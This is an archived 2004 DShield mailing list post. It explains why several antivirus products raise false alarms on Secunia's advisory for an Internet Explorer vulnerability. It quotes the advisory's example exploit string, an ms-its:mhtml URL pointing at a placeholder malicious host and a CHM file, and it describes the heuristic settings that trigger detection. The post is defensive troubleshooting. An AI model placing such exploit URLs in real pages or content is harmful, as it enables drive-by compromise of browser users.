[Dshield] What triggered the positive false alarms (Was: An unfixed highly critical vulnerability discovered in Microsoft Internet Explorer)

Peter Stendahl-Juvonen peter.stendahl-juvonen at welho.com
Thu Apr 15 20:04:29 GMT 2004


What triggered the positive false alarms (Was: An unfixed highly
critical vulnerability discovered in Microsoft Internet Explorer) 

list-bounces at lists.dshield.org <mailto:list-bounces at lists.dshield.org>
wrote on Wednesday, April 14, 2004 12:07 AM UTC+3 on behalf of Doug
White  

| NAV2001
| F-PROT
| AVG
| Clam-AV
| Antivir
| 
| All returned the pop-up

|| Running Sophos and do not get anything. Also installed PivX
|| Kwik-Fix... 
|| 
|| Chuck
|| 
|| -----Original Message-----
|| From: list-bounces at lists.dshield.org
|| [mailto:list-bounces at lists.dshield.org] On Behalf Of Paul Marsh
|| Sent: Tuesday, April 13, 2004 8:41 AM To: General DShield Discussion
|| List Subject: RE: [Dshield] An unfixed highly
|| criticalvulnerabilitydiscoveredinMicrosoft Internet Explorer
|| 
|| Has anyone running the other AV desktop products tested the site too
|| see if it gets caught? http://secunia.com/advisories/10523/
|| 

Doug, Chuck, Paul et al.

Doug,  Able to confirm the following for the 'other' A/V S/W?


Researched this positive false alarm issue further, found the cause of
the error (for NAV2004), and what triggers the alarms.

When in NAV2004's settings for System | Auto-Protect | Bloodhound | How
to protect against new and unknown viruses | [v] 'Enable Bloodhound
heuristics (recommended)' is set to option "Highest level of protection"
instead of the default setting "Normal", Norton AntiVirus2004 (and
apparently at least also NAV2003 and NAV2001) erroneously detect a
threat in a Microsoft Word document file containing this string of
characters:

"Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//mal
icious.chm::/evil.html"

NAV2004 prompts several positive false alert pop-ups claiming it has
detected "Bloodhound.Exploit.6" in the file containing nothing but the
example string of characters quoted above.

An error in the heuristics algorithm no doubt causes the erroneous
'detection' and the vendor should therefore fix the algorithm.

If you have Microsoft Word (2002 = XP) available with Norton AntiVirus
plug-in installed, NAV2004 Auto-Protect set to "On" and Script Blocking
set to "On" you will experience this malfunction in NAV2004 when you try
to save the file (or MS Word tries to auto-save the document).

Since it is so trivial to set up this configuration, there is no problem
in reproducing the error.

I have reported two analogical erroneous detections and positive false
alerts to Symantec Corp's Tech Support:

1) The first issue deals with the same erroneous detection and same
positive false alert when browsing Secunia's (an IT-security company)
web page at http://secunia.com/advisories/10523/ . The web page address
contains the very same example quoted above. NAV2004 is unable to access
or repair the file.

2) The second issue deals with cached image of a web page (URL in issue
# 2 below) containing this same example causing the same erroneous
detection and same positive false alerts. After the browser stops using
the file, NAV2004 is able to access and quarantine the file, and, e.g.
send it to Symantec.

I have requested Symantec Corp to correct this error in Norton
AntiVirus2004 (which is present also in NAV2001, NAV2003 and possibly in
NAV2002).


- Pete


      "One change leaves the way open for the introduction of others."
 Niccolo Machiavelli (1469-1527); Italian philosopher, statesman,
writer. 





More information about the list mailing list